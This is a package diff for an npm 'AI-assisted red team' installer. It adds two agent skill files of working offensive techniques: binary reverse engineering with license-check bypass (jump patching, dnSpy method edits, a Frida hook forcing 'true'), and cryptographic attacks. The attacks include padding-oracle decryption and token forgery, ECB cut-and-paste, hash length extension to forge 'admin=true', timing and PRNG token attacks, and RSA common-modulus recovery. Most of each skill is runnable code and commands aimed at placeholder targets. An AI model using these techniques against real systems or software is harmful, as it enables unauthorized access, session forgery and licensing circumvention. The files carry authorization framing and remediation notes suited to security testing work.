rtexit-method 0.1.4 → 0.1.5

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "rtexit-method",
-  "version": "0.1.4",
+  "version": "0.1.5",
   "description": "RTExit - AI-assisted Red Team methodology installer",
   "license": "MIT",
   "author": "Exit Code",

package/packaged-assets/.agents/skills/rt-binary-reverse-engineering/SKILL.md

@@ -0,0 +1,304 @@
+---
+name: rt-binary-reverse-engineering
+description: "Binary reverse engineering skill for authorized red team engagements. Ghidra and IDA Pro workflow for decompilation, x64dbg dynamic analysis, .NET assembly decompilation with dnSpy/ILSpy, Java JAR analysis, ELF binary analysis, finding hardcoded credentials and API keys in binaries, license check bypassing, and understanding proprietary protocol implementations. Use when analyzing compiled applications, firmware, or custom protocols."
+---
+
+# rt-binary-reverse-engineering — Binary Analysis & Reverse Engineering
+
+## Overview
+
+Binary reverse engineering analyzes compiled executables to understand their behavior without source code. In red team engagements, this discovers hardcoded credentials, hidden functionality, bypassable authentication, and proprietary protocol weaknesses.
+
+---
+
+## Phase 1 — Initial Triage (Before Disassembly)
+
+```bash
+# File type identification
+file target_binary
+# ELF 64-bit LSB executable → Linux binary
+# PE32+ executable → Windows binary
+# Mach-O → macOS binary
+
+# Basic string extraction (fastest wins)
+strings target_binary | grep -iE "password|secret|key|token|admin|api|url|http"
+strings -n 8 target_binary | grep -iE "BEGIN.*KEY|PRIVATE|jwt"
+
+# Detect packing/obfuscation
+die target_binary        # Detect-It-Easy
+upx -t target_binary     # Check if UPX packed
+entropy target_binary    # High entropy (>7.5) = encrypted/packed sections
+
+# Symbols and imports
+nm target_binary         # Symbol table (if not stripped)
+objdump -d target_binary # Disassembly
+ldd target_binary        # Dynamic library dependencies
+readelf -a target_binary # Full ELF headers
+
+# PE analysis (Windows)
+pecheck target.exe
+dumpbin /imports target.exe  # Imported functions
+dumpbin /exports target.exe  # Exported functions
+
+# Quick wins: look for these imports
+# CreateProcess, WinExec, ShellExecute = code execution
+# CryptDecrypt, CryptImportKey = crypto operations
+# InternetOpenUrl, HttpSendRequest = network communication
+# RegOpenKey, RegSetValue = registry operations
+```
+
+---
+
+## Phase 2 — Static Analysis with Ghidra
+
+```bash
+# Install Ghidra
+# https://ghidra-sre.org → download → ./ghidraRun
+
+# Headless analysis (scriptable)
+./analyzeHeadless /tmp/ghidra_project MyProject \
+  -import target_binary \
+  -postScript PrintStrings.py \
+  -deleteProject
+
+# Key Ghidra workflow:
+# 1. Import binary → Auto-analyze
+# 2. Symbol Tree → Functions → main()
+# 3. Decompiler window → clean C-like pseudocode
+# 4. Search → Memory → search for strings (hardcoded strings)
+# 5. References → find all callers of crypto/auth functions
+```
+
+```python
+# Ghidra script: find hardcoded strings (run in Script Manager)
+from ghidra.app.script import GhidraScript
+from ghidra.program.model.data import StringDataType
+
+class FindSecrets(GhidraScript):
+    def run(self):
+        keywords = ["password", "secret", "api_key", "token", "admin"]
+        for ref in currentProgram.getReferenceManager().getReferenceIterator(None):
+            addr = ref.getToAddress()
+            data = getDataAt(addr)
+            if data and isinstance(data.getDataType(), StringDataType):
+                val = str(data.getValue()).lower()
+                for kw in keywords:
+                    if kw in val:
+                        print(f"[SECRET] {addr}: {data.getValue()}")
+```
+
+---
+
+## Phase 3 — .NET Binary Analysis (dnSpy / ILSpy)
+
+```bash
+# .NET binaries contain IL bytecode → decompile to near-original C#
+
+# dnSpy (best for .NET — also debugger)
+# https://github.com/dnSpy/dnSpy
+# Open .exe/.dll → full source code decompilation
+
+# ILSpy (CLI)
+ilspycmd target.exe -o ./decompiled/
+
+# dotPeek (JetBrains — free)
+# Open → decompile → navigate class hierarchy
+
+# What to look for in decompiled .NET:
+grep -r "password\|connectionString\|ApiKey\|secret" ./decompiled/ --include="*.cs"
+grep -r "hardcoded\|TODO.*password\|admin123" ./decompiled/
+
+# .NET config files (often not encrypted)
+cat ./decompiled/App.config
+cat web.config | grep -i "password\|connectionString"
+
+# Assembly manipulation: patch license check
+# 1. Open in dnSpy
+# 2. Find: IsLicensed() or CheckLicense()
+# 3. Right-click method → Edit Method
+# 4. Change return false → return true
+# 5. File → Save Module
+```
+
+---
+
+## Phase 4 — Java JAR Analysis
+
+```bash
+# Decompile JAR
+# jadx — best Java decompiler
+jadx -d ./decompiled_java/ target.jar
+# Browse ./decompiled_java/ as Java source
+
+# procyon (alternative)
+java -jar procyon-decompiler.jar target.jar -o ./decompiled/
+
+# Look for hardcoded secrets
+grep -r "password\|apiKey\|secret\|jdbc:" ./decompiled_java/ --include="*.java"
+
+# Extract embedded resources
+jar xf target.jar
+# Inspect: META-INF/, resources/, application.properties
+
+cat application.properties | grep -i "password\|secret\|datasource"
+cat META-INF/MANIFEST.MF  # Entry point class
+
+# Decompile Android APK (Dalvik bytecode)
+jadx -d ./apk_decompiled/ app.apk
+grep -r "apiKey\|password\|secret\|BuildConfig" ./apk_decompiled/
+cat ./apk_decompiled/resources/res/values/strings.xml | grep -i "key\|token\|password"
+```
+
+---
+
+## Phase 5 — Dynamic Analysis with x64dbg
+
+```bash
+# x64dbg: Windows debugger for 32/64-bit binaries
+# https://x64dbg.com
+
+# Workflow:
+# 1. Open target in x64dbg
+# 2. Run → break at entry point
+# 3. Search → All User Modules → String References → search "password"
+# 4. Set breakpoint at identified function → Run → inspect values
+
+# Key techniques:
+# Patch jump: change JE (74) to JMP (EB) to bypass license check
+# Patch comparison: change CMP result to always succeed
+# Memory view: inspect decrypted strings at runtime
+# API logger: log all WinAPI calls → find authentication logic
+```
+
+```python
+# Automated dynamic analysis with frida (no source needed)
+# Hook any function by address or name
+
+import frida, sys
+
+script_code = """
+// Hook license check function at address 0x401234
+Interceptor.attach(ptr("0x401234"), {
+    onEnter: function(args) {
+        console.log("[*] License check called");
+        console.log("    Arg 0:", args[0].readUtf8String());
+    },
+    onLeave: function(retval) {
+        console.log("[*] License check returned:", retval);
+        retval.replace(1);  // Force return true (bypass)
+    }
+});
+
+// Hook all calls to strcmp (find credential comparisons)
+Interceptor.attach(Module.findExportByName(null, "strcmp"), {
+    onEnter: function(args) {
+        var s1 = args[0].readUtf8String();
+        var s2 = args[1].readUtf8String();
+        if (s1 && s2 && (s1.length > 3 || s2.length > 3)) {
+            console.log("[strcmp]", s1, "vs", s2);
+        }
+    }
+});
+"""
+
+process = frida.spawn(["./target_binary"])
+session = frida.attach(process)
+script = session.create_script(script_code)
+script.load()
+frida.resume(process)
+sys.stdin.read()
+```
+
+---
+
+## Phase 6 — Finding Hardcoded Credentials
+
+```bash
+# Automated binary secret scanning
+# trufflehog (supports binaries)
+trufflehog filesystem ./target_directory/ --json | jq '.SourceMetadata.Data.Filesystem.file + ": " + .Raw'
+
+# YARA rules for credential patterns in binaries
+cat > secrets.yar << 'EOF'
+rule HardcodedPassword {
+    strings:
+        $pass1 = "password" nocase
+        $pass2 = "passwd" nocase
+        $key1 = "api_key" nocase
+        $key2 = "apikey" nocase
+        $aws = /AKIA[0-9A-Z]{16}/
+        $jwt = /eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/
+    condition:
+        any of them
+}
+EOF
+yara -r secrets.yar ./target_binary
+
+# binwalk — extract embedded content from binaries
+binwalk -e target_firmware.bin
+# Extracts: filesystems, compressed data, certificates, private keys
+ls _target_firmware.bin.extracted/
+
+# floss — deobfuscate strings in malware/obfuscated binaries
+floss target.exe | grep -iE "http|password|key|token"
+```
+
+---
+
+## Phase 7 — Protocol Reverse Engineering
+
+```bash
+# Capture traffic from binary + analyze
+# 1. Run binary under strace (Linux)
+strace -e trace=network,read,write -xx ./target_binary 2>&1 | grep -A2 "sendto\|write"
+
+# 2. Capture with Wireshark/tcpdump
+tcpdump -i lo -w capture.pcap &
+./target_binary
+# Analyze capture.pcap in Wireshark
+
+# 3. Hook socket calls with frida
+cat > proto_hook.js << 'EOF'
+var send = Module.findExportByName("libc.so.6", "send");
+Interceptor.attach(send, {
+    onEnter: function(args) {
+        var len = args[2].toInt32();
+        if (len > 0) {
+            console.log("[send] " + len + " bytes:");
+            console.log(hexdump(args[1], {length: Math.min(len, 256)}));
+        }
+    }
+});
+EOF
+frida -l proto_hook.js ./target_binary
+
+# 4. Identify protocol fields
+# - Fixed headers (magic bytes)
+# - Length fields
+# - Checksum/CRC fields
+# - Encrypted vs cleartext regions
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** strings + grep for credentials · jadx for .NET/Java · floss for obfuscated strings
+
+**INTERMEDIATE:** Ghidra decompilation · x64dbg breakpoints · Frida for dynamic hooking · .NET patching with dnSpy
+
+**ADVANCED:** Custom Ghidra scripts · Protocol reverse engineering · Anti-debug bypass · Binary patching
+
+**EXPERT:** Firmware analysis with binwalk · Custom deobfuscation · Vulnerability research from decompiled code · 0-day discovery
+
+---
+
+## References
+
+- Ghidra: https://ghidra-sre.org
+- x64dbg: https://x64dbg.com
+- jadx: https://github.com/skylot/jadx
+- dnSpy: https://github.com/dnSpy/dnSpy
+- Frida: https://frida.re
+- Practical Binary Analysis (book): https://nostarch.com/binaryanalysis
+- MITRE T1027: https://attack.mitre.org/techniques/T1027/

package/packaged-assets/.agents/skills/rt-crypto-attacks/SKILL.md

@@ -0,0 +1,350 @@
+---
+name: rt-crypto-attacks
+description: "Cryptographic attack skill for authorized engagements. CBC padding oracle exploitation, ECB block manipulation and cut-paste attacks, hash length extension attacks, weak PRNG exploitation, timing attacks on authentication, MD5/SHA1 collision exploitation, RSA common modulus and small exponent attacks, and identifying custom/broken encryption schemes. Use when testing cryptographic implementations in web apps, APIs, or proprietary protocols."
+---
+
+# rt-crypto-attacks — Cryptographic Vulnerability Exploitation
+
+## Overview
+
+Cryptographic vulnerabilities arise from using broken algorithms, incorrect modes of operation, weak key generation, or flawed implementations. In web applications and APIs, these manifest as exploitable oracle attacks, forgeable tokens, and bypassable authentication.
+
+---
+
+## Attack 1 — CBC Padding Oracle
+
+**Condition:** Application decrypts user-supplied ciphertext and returns different errors for padding failures vs decryption failures (even via timing differences).
+
+**Impact:** Decrypt any ciphertext block-by-block without the key. Forge arbitrary ciphertext.
+
+```python
+# Manual padding oracle concept
+# CBC decryption: P[i] = D(C[i]) XOR C[i-1]
+# Padding oracle: if we flip bytes in C[i-1], and server says "padding valid"
+# → we can deduce D(C[i]) byte by byte
+
+# Tool: PadBuster
+padbuster https://target.com/profile?data=BASE64_ENCRYPTED_DATA BASE64_ENCRYPTED_DATA 8 \
+  -encoding 0 \
+  -error "Invalid padding"
+# 8 = block size (AES = 16, DES = 8)
+
+# Decrypt existing ciphertext
+padbuster https://target.com/api BASE64_CIPHERTEXT 16 -encoding 2
+
+# Forge new plaintext (e.g., change role=user to role=admin)
+padbuster https://target.com/api BASE64_CIPHERTEXT 16 \
+  -encoding 2 \
+  -plaintext "role=admin&user=attacker"
+
+# Tool: bit-flipper / padding-oracle-attack
+pip3 install padding-oracle-attacker
+python3 -m padding_oracle_attacker decrypt \
+  --url "https://target.com/api?token={}" \
+  --ciphertext "BASE64_TOKEN" \
+  --block-size 16 \
+  --error "Invalid token"
+```
+
+**Detection in source code:**
+```python
+# VULNERABLE — different exceptions leak oracle
+try:
+    plaintext = cipher.decrypt(ciphertext)
+except PaddingError:
+    return "Invalid padding"   # ← ORACLE
+except DecryptionError:
+    return "Decryption failed" # ← ORACLE (different response = oracle)
+
+# SECURE — same response always
+try:
+    plaintext = cipher.decrypt(ciphertext)
+except Exception:
+    return "Invalid token"  # Always same response
+```
+
+---
+
+## Attack 2 — ECB Block Manipulation (Cut & Paste)
+
+**Condition:** Application uses AES-ECB mode (identical plaintext blocks → identical ciphertext blocks).
+
+**Impact:** Rearrange, duplicate, or substitute encrypted blocks to forge arbitrary plaintexts.
+
+```python
+# Detect ECB: send repeated plaintext, check for repeated blocks in ciphertext
+import requests, base64
+
+def detect_ecb(ciphertext_b64):
+    ct = base64.b64decode(ciphertext_b64)
+    blocks = [ct[i:i+16] for i in range(0, len(ct), 16)]
+    return len(blocks) != len(set(blocks))  # True = ECB detected
+
+# Test: register with username "AAAAAAAAAAAAAAAA" (16 A's)
+# If ciphertext has repeated 16-byte blocks → ECB mode
+
+# ECB Cut-and-Paste Attack Example:
+# Suppose encrypted cookie format: role=user&admin=false
+# Block 1 (bytes 0-15):  "role=user&admin="
+# Block 2 (bytes 16-31): "false___________" (padded)
+
+# Step 1: craft input to push "admin=true" to a clean block boundary
+# Step 2: capture that block
+# Step 3: substitute it into another session's cookie
+
+# Automated with ecb-cpa tool
+pip3 install ecb_cpa
+python3 ecb_cpa.py --url "https://target.com/encrypt" \
+  --param "username" \
+  --target "admin=true"
+```
+
+---
+
+## Attack 3 — Hash Length Extension
+
+**Condition:** `MAC = hash(secret + message)` — attacker knows hash and message length but not secret.
+
+**Impact:** Append data to message and compute valid MAC without knowing the secret.
+
+```bash
+# Tools
+pip3 install hashpumpy
+# Or: hashpump binary
+
+# Example: API uses HMAC = MD5(secret + "user=alice")
+# We know the hash and want to forge: "user=alice&admin=true"
+
+python3 << 'EOF'
+import hashpumpy
+
+original_data = b"user=alice"
+original_hash = "a3f8c2d1..."  # known hash from response
+secret_length = 16  # guess (try 8, 12, 16, 20, 24, 32)
+data_to_append = b"&admin=true"
+
+new_hash, new_data = hashpumpy.hashpump(
+    original_hash,
+    original_data,
+    data_to_append,
+    secret_length
+)
+print(f"New hash: {new_hash}")
+print(f"New data: {new_data.hex()}")
+# Send new_data as message + new_hash as MAC
+EOF
+
+# hashpump CLI
+hashpump -s "KNOWN_HASH" -d "KNOWN_DATA" -a "&admin=true" -k 16
+```
+
+---
+
+## Attack 4 — Timing Attacks
+
+**Condition:** Authentication comparison uses non-constant-time string comparison.
+
+```python
+# Detection: measure response time for known-bad vs close-to-valid tokens
+import requests, time, statistics
+
+def measure_timing(token):
+    times = []
+    for _ in range(10):
+        start = time.perf_counter()
+        requests.get(f"https://target.com/api", 
+                    headers={"Authorization": f"Bearer {token}"})
+        times.append(time.perf_counter() - start)
+    return statistics.mean(times)
+
+# Test tokens that differ at position 0, 1, 2...
+# If correct first byte takes longer → timing leak
+baseline = measure_timing("AAAAAAAAAAAAAAAA")
+for byte in "0123456789abcdef":
+    t = measure_timing(byte + "AAAAAAAAAAAAAAA")
+    if t > baseline + 0.005:  # 5ms difference
+        print(f"Correct first byte: {byte}")
+
+# Tool: timing-attack
+pip3 install timing-attack
+timing-attack "https://target.com/api?token=PAYLOAD" --payload CHARSET
+```
+
+---
+
+## Attack 5 — Weak PRNG / Predictable Tokens
+
+```python
+# Test for predictable tokens — collect multiple and analyze
+
+import requests, time
+
+tokens = []
+for _ in range(20):
+    r = requests.get("https://target.com/reset-password?email=test@test.com")
+    # Extract token from email or response
+    tokens.append(extract_token(r))
+    time.sleep(0.1)
+
+# Check for sequential tokens
+if all(int(t, 16) == int(tokens[0], 16) + i for i, t in enumerate(tokens)):
+    print("SEQUENTIAL TOKENS DETECTED")
+
+# Check for timestamp-based tokens
+import hashlib
+ts = int(time.time())
+for delta in range(-5, 5):
+    candidate = hashlib.md5(str(ts + delta).encode()).hexdigest()
+    if candidate in tokens:
+        print(f"TIMESTAMP-BASED TOKEN: offset={delta}")
+
+# Tool: OWASP TokenAnalyzer
+# Tool: Burp Suite Sequencer (statistical analysis of token randomness)
+```
+
+---
+
+## Attack 6 — RSA Common Modulus Attack
+
+```bash
+# If two RSA public keys share the same modulus (n) but different exponents (e1, e2)
+# And the same message m is encrypted with both:
+# C1 = m^e1 mod n, C2 = m^e2 mod n
+# → Recover m using extended Euclidean algorithm
+
+python3 << 'EOF'
+from math import gcd
+
+def extended_gcd(a, b):
+    if b == 0: return a, 1, 0
+    g, x, y = extended_gcd(b, a % b)
+    return g, y, x - (a // b) * y
+
+def common_modulus_attack(n, e1, e2, c1, c2):
+    g, a, b = extended_gcd(e1, e2)
+    if g != 1: return None  # gcd must be 1
+    if a < 0:
+        c1 = pow(c1, -1, n)  # modular inverse
+        a = -a
+    if b < 0:
+        c2 = pow(c2, -1, n)
+        b = -b
+    return pow(c1, a, n) * pow(c2, b, n) % n
+
+# Usage
+n  = int("MODULUS_HEX", 16)
+e1 = 65537
+e2 = 17
+c1 = int("CIPHERTEXT_1_HEX", 16)
+c2 = int("CIPHERTEXT_2_HEX", 16)
+m = common_modulus_attack(n, e1, e2, c1, c2)
+print(f"Recovered plaintext: {bytes.fromhex(hex(m)[2:])}")
+EOF
+```
+
+---
+
+## Attack 7 — Identify Broken / Custom Encryption
+
+```bash
+# Cipher identification
+pip3 install pycipher hashid
+
+# Identify hash type
+hashid "5f4dcc3b5aa765d61d8327deb882cf99"
+# Output: [+] MD5
+
+# Check for ROT13 / Caesar / XOR
+python3 -c "
+import base64
+
+data = 'VGhpcyBpcyBhIHRlc3Q='  # suspect encoded string
+print('base64:', base64.b64decode(data))
+
+# XOR with single byte
+raw = bytes.fromhex('0a1b2c3d')
+for key in range(256):
+    result = bytes([b ^ key for b in raw])
+    if all(32 <= b < 127 for b in result):
+        print(f'XOR key {key}: {result}')
+"
+
+# Frequency analysis (classical ciphers)
+python3 << 'EOF'
+from collections import Counter
+cipher = "GUVF VF N GRFG"
+freq = Counter(cipher.replace(' ', ''))
+print("Most common:", freq.most_common(5))
+# E is most common in English → map most common cipher char to E
+# Try ROT13: tr 'A-Za-z' 'N-ZA-Mn-za-m'
+EOF
+
+# Tool: CyberChef (web) for automated identification
+# Tool: dcode.fr for classical cipher identification
+```
+
+---
+
+## Attack 8 — MD5/SHA1 Collision Exploitation
+
+```bash
+# MD5 collision: two different inputs with same hash
+# shattered.io: SHA1 collision
+
+# If app uses MD5 for file integrity or token deduplication:
+# Download collision pair from https://www.mscs.dal.ca/~selinger/md5collision/
+
+# Demonstrate: same MD5, different content
+md5sum message1.bin message2.bin
+# Both output same hash → integrity check bypassed
+
+# SHA1 collision (shattered.io)
+curl -o shattered-1.pdf https://shattered.io/static/shattered-1.pdf
+curl -o shattered-2.pdf https://shattered.io/static/shattered-2.pdf
+sha1sum shattered-1.pdf shattered-2.pdf
+# Same SHA1 → demonstrates file signing bypass
+```
+
+---
+
+## Finding Documentation
+
+```
+Finding: CBC Padding Oracle
+Severity: HIGH (CVSS 7.5)
+CWE: CWE-649 (Reliance on Obfuscation or Encryption without Integrity Check)
+MITRE: T1600 (Weaken Encryption)
+
+Evidence:
+- Different HTTP responses for valid vs invalid padding
+- Decrypted session token contents (demonstrate impact)
+- Forged admin session token
+
+Remediation:
+- Use AES-GCM (authenticated encryption) instead of AES-CBC
+- If CBC required: add HMAC-SHA256 authentication before decryption
+- Ensure all decryption failures return identical responses
+- Implement constant-time comparison for all token validation
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** Run padbuster/padding oracle tools, use hashid for hash identification, CyberChef for encoding analysis
+
+**INTERMEDIATE:** ECB cut-and-paste attacks, hash length extension with hashpump, timing attack measurement
+
+**ADVANCED:** Custom padding oracle scripts, RSA common modulus attack, weak PRNG prediction
+
+**EXPERT:** Full cryptographic protocol analysis, custom cipher reverse engineering, side-channel exploitation
+
+---
+
+## References
+
+- PadBuster: https://github.com/AonCyberLabs/PadBuster
+- hashpumpy: https://github.com/bwall/HashPump
+- CryptoHack (learning): https://cryptohack.org
+- Cryptopals challenges: https://cryptopals.com
+- MITRE T1600: https://attack.mitre.org/techniques/T1600/